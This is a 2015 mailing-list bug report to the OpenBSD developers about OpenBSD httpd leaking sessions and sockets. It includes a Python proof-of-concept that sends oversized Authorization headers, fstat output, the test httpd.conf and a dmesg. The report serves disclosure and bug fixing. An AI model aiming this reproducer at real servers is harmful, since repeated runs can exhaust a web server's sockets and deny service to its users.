session leakage in httpd

Sun, 09 Aug 2015 10:26:24 -0700 

Hi,

while testing the -current (I also see the issue on 5.7) httpd with a
fuzzer I noticed that some HTTP requests result in the session not
closing properly.

I've attached inline a Python script that should demostrate the issue.
I've tested the issue locally and from adjacent network.

After running the Python script against httpd for a couple of times you
should see the following in `fstat'.

$ fstat | grep '^www'
* snip*
www      httpd      26860    3* internet stream tcp 0x0 *:80
www      httpd      26860    4* unix stream 0x0
www      httpd      26860    5* internet stream tcp 0x0 *:0
www      httpd      26860    6* internet stream tcp 0x0 *:0
www      httpd      26860    7* unix stream 0x0
www      httpd      26860    8* internet stream tcp 0x0 *:0
www      httpd      26860    9 kqueue 0x0 0 state: W
www      httpd      26860   10* internet stream tcp 0x0 *:0
www      httpd      26860   11* internet stream tcp 0x0 *:0
www      httpd      26860   12* internet stream tcp 0x0 *:0
www      httpd      26860   13* internet stream tcp 0x0 *:0
www      httpd      26860   14* internet stream tcp 0x0 *:0
www      httpd      26860   15* internet stream tcp 0x0 *:0

Note the sockets #10-#15.

Normally I would provide a patch when reporting issues but I've been
trying to debug this for a while and I thought reporting this now
would make it possible to get it fixed before release.

---8<--------sock-httpd.py--------------------------------------------
#!/usr/bin/python

import sys
import socket
import struct

def send_payload(s):
    s.send("GET / HTTP/1.1\r\nKeep-Alive: 300\r\nAuthorization: Negotiate ")
    s.send("")
    s.send("A" * 32767)
    s.send("")
    s.send("A" * 32767)
    s.send("")
    s.send("A" * 32767)
    s.send("")

def wait(s):
    try:
        s.recv(1024)
    except:
        pass

def main():
    if len(sys.argv) < 3:
        print "usage:", sys.argv[0], "<target> <port>"
        sys.exit(1)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
    s.settimeout(0.2)

    s.connect((sys.argv[1], int(sys.argv[2])))
    send_payload(s)
    wait(s)
    s.close()

main()
---8<--------sock-httpd.py--------------------------------------------

---8<--------httpd.conf-----------------------------------------------
# $OpenBSD: httpd.conf,v 1.11 2014/08/25 14:27:54 reyk Exp $

prefork 1

# A minimal default server
server "default" {
        listen on * port 80

        directory auto index
}

# Include MIME types instead of the built-in ones
types {
        include "/usr/share/misc/mime.types"
}
---8<--------httpd.conf-----------------------------------------------

---8<--------dmesg----------------------------------------------------
OpenBSD 5.8 (GENERIC.MP) #1234: Thu Aug  6 09:26:52 MDT 2015
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2087387136 (1990MB)
avail mem = 2020290560 (1926MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0xe0010 (63 entries)
bios0: vendor LENOVO version "7NETC1WW (2.21 )" date 10/09/2009
bios0: LENOVO 766734G
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP SSDT ECDT TCPA APIC MCFG HPET SLIC BOOT ASF! SSDT SSDT 
SSDT SSDT SSDT
acpi0: wakeup devices LID_(S3) SLPB(S3) DURT(S3) IGBE(S4) EXP0(S4) EXP1(S4) 
EXP2(S4) EXP3(S4) EXP4(S4) PCI1(S4) USB0(S3) USB1(S3) USB2(S3) USB3(S3) 
USB4(S3) EHC0(S3) [...]
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpiec0 at acpi0
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM)2 Duo CPU L7500 @ 1.60GHz, 1795.83 MHz
cpu0: 
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,NXE,LONG,LAHF,PERF,SENSOR
cpu0: 4MB 64b/line 16-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 199MHz
cpu0: mwait min=64, max=64, C-substates=0.2.2.2.2, IBE
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel(R) Core(TM)2 Duo CPU L7500 @ 1.60GHz, 1596.01 MHz
cpu1: 
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,CX16,xTPR,PDCM,NXE,LONG,LAHF,PERF,SENSOR
cpu1: 4MB 64b/line 16-way L2 cache
cpu1: smt 0, core 1, package 0
ioapic0 at mainbus0: apid 1 pa 0xfec00000, version 20, 24 pins
ioapic0: misconfigured as apic 2, remapped to apid 1
acpimcfg0 at acpi0 addr 0xf0000000, bus 0-63
acpihpet0 at acpi0: 14318179 Hz
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus -1 (AGP_)
acpiprt2 at acpi0: bus 2 (EXP0)
acpiprt3 at acpi0: bus 3 (EXP1)
acpiprt4 at acpi0: bus -1 (EXP2)
acpiprt5 at acpi0: bus -1 (EXP3)
acpiprt6 at acpi0: bus -1 (EXP4)
acpiprt7 at acpi0: bus 5 (PCI1)
acpicpu0 at acpi0: !C3(250@17 mwait.3@0x20), !C2(500@1 mwait.1@0x10), C1(1000@1 
mwait.1), PSS
acpicpu1 at acpi0: !C3(250@17 mwait.3@0x20), !C2(500@1 mwait.1@0x10), C1(1000@1 
mwait.1), PSS
acpipwrres0 at acpi0: PUBS, resource for USB0, USB2, USB4, EHC0, EHC1
acpitz0 at acpi0: critical temperature is 127 degC
acpitz1 at acpi0: critical temperature is 99 degC
acpibtn0 at acpi0: LID_
acpibtn1 at acpi0: SLPB
acpibat0 at acpi0: BAT0 model "92P1163" serial  1439 type LION oem "SANYO"
acpibat1 at acpi0: BAT1 not present
acpibat2 at acpi0: BAT2 not present
acpiac0 at acpi0: AC unit online
acpithinkpad0 at acpi0
acpidock0 at acpi0: GDCK not docked (0)
cpu0: Enhanced SpeedStep 1795 MHz: speeds: 1601, 1600, 1200, 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel GM965 Host" rev 0x0c
vga1 at pci0 dev 2 function 0 "Intel GM965 Video" rev 0x0c
intagp0 at vga1
agp0 at intagp0: aperture at 0xe0000000, size 0x10000000
inteldrm0 at vga1
drm0 at inteldrm0
inteldrm0: 1024x768
wsdisplay0 at vga1 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
"Intel GM965 Video" rev 0x0c at pci0 dev 2 function 1 not configured
em0 at pci0 dev 25 function 0 "Intel ICH8 IGP M AMT" rev 0x03: msi, address 
00:16:d3:c4:5f:ac
uhci0 at pci0 dev 26 function 0 "Intel 82801H USB" rev 0x03: apic 1 int 20
uhci1 at pci0 dev 26 function 1 "Intel 82801H USB" rev 0x03: apic 1 int 21
ehci0 at pci0 dev 26 function 7 "Intel 82801H USB" rev 0x03: apic 1 int 22
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
azalia0 at pci0 dev 27 function 0 "Intel 82801H HD Audio" rev 0x03: msi
azalia0: codecs: Analog Devices AD1984, Conexant/0x2bfa, using Analog Devices 
AD1984
audio0 at azalia0
ppb0 at pci0 dev 28 function 0 "Intel 82801H PCIE" rev 0x03: msi
pci1 at ppb0 bus 2
ppb1 at pci0 dev 28 function 1 "Intel 82801H PCIE" rev 0x03: msi
pci2 at ppb1 bus 3
iwn0 at pci2 dev 0 function 0 "Intel Wireless WiFi Link 4965" rev 0x61: msi, 
MIMO 2T3R, MoW2, address 00:1d:e0:52:62:67
uhci2 at pci0 dev 29 function 0 "Intel 82801H USB" rev 0x03: apic 1 int 16
uhci3 at pci0 dev 29 function 1 "Intel 82801H USB" rev 0x03: apic 1 int 17
ehci1 at pci0 dev 29 function 7 "Intel 82801H USB" rev 0x03: apic 1 int 19
usb1 at ehci1: USB revision 2.0
uhub1 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ppb2 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xf3
pci3 at ppb2 bus 5
cbb0 at pci3 dev 0 function 0 "Ricoh 5C476 CardBus" rev 0xba: apic 1 int 16
"Ricoh 5C832 Firewire" rev 0x04 at pci3 dev 0 function 1 not configured
sdhc0 at pci3 dev 0 function 2 "Ricoh 5C822 SD/MMC" rev 0x21: apic 1 int 18
sdmmc0 at sdhc0
cardslot0 at cbb0 slot 0 flags 0
cardbus0 at cardslot0: bus 6 device 0 cacheline 0x8, lattimer 0xb0
pcmcia0 at cardslot0
pcib0 at pci0 dev 31 function 0 "Intel 82801HEM LPC" rev 0x03
pciide0 at pci0 dev 31 function 2 "Intel 82801HBM SATA" rev 0x03: DMA, channel 
0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: <SAMSUNG SSD 830 Series>
wd0: 16-sector PIO, LBA48, 122104MB, 250069680 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 6
ichiic0 at pci0 dev 31 function 3 "Intel 82801H SMBus" rev 0x03: apic 1 int 23
iic0 at ichiic0
usb2 at uhci0: USB revision 1.0
uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb3 at uhci1: USB revision 1.0
uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb4 at uhci2: USB revision 1.0
uhub4 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb5 at uhci3: USB revision 1.0
uhub5 at usb5 "Intel UHCI root hub" rev 1.00/1.00 addr 1
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5 irq 1 irq 12
pckbd0 at pckbc0 (kbd slot)
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
aps0 at isa0 port 0x1600/31
ugen0 at uhub2 port 2 "STMicroelectronics Biometric Coprocessor" rev 1.00/0.01 
addr 2
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on wd0a (7025a19a0df0c450.a) swap on wd0b dump on wd0b
ugen0 detached
uhub2 detached
uhub3 detached
uhub0 detached
uhub4 detached
uhub5 detached
uhub1 detached
uhub0 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub1 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub2 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
uhub3 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub4 at usb5 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub5 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ugen0 at uhub0 port 2 "STMicroelectronics Biometric Coprocessor" rev 1.00/0.01 
addr 2
ugen0 detached
uhub0 detached
uhub1 detached
uhub2 detached
uhub3 detached
uhub4 detached
uhub5 detached
uhub0 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub1 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub2 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
uhub3 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub4 at usb5 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub5 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ugen0 at uhub0 port 2 "STMicroelectronics Biometric Coprocessor" rev 1.00/0.01 
addr 2
ugen0 detached
uhub0 detached
uhub1 detached
uhub2 detached
uhub3 detached
uhub4 detached
uhub5 detached
uhub0 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub1 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub2 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
uhub3 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub4 at usb5 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub5 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ugen0 at uhub0 port 2 "STMicroelectronics Biometric Coprocessor" rev 1.00/0.01 
addr 2
ugen0 detached
uhub0 detached
uhub1 detached
uhub2 detached
uhub3 detached
uhub4 detached
uhub5 detached
uhub0 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub1 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub2 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
uhub3 at usb4 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub4 at usb5 "Intel UHCI root hub" rev 1.00/1.00 addr 1
uhub5 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ugen0 at uhub0 port 2 "STMicroelectronics Biometric Coprocessor" rev 1.00/0.01 
addr 2
---8<--------dmesg----------------------------------------------------

Reply via email to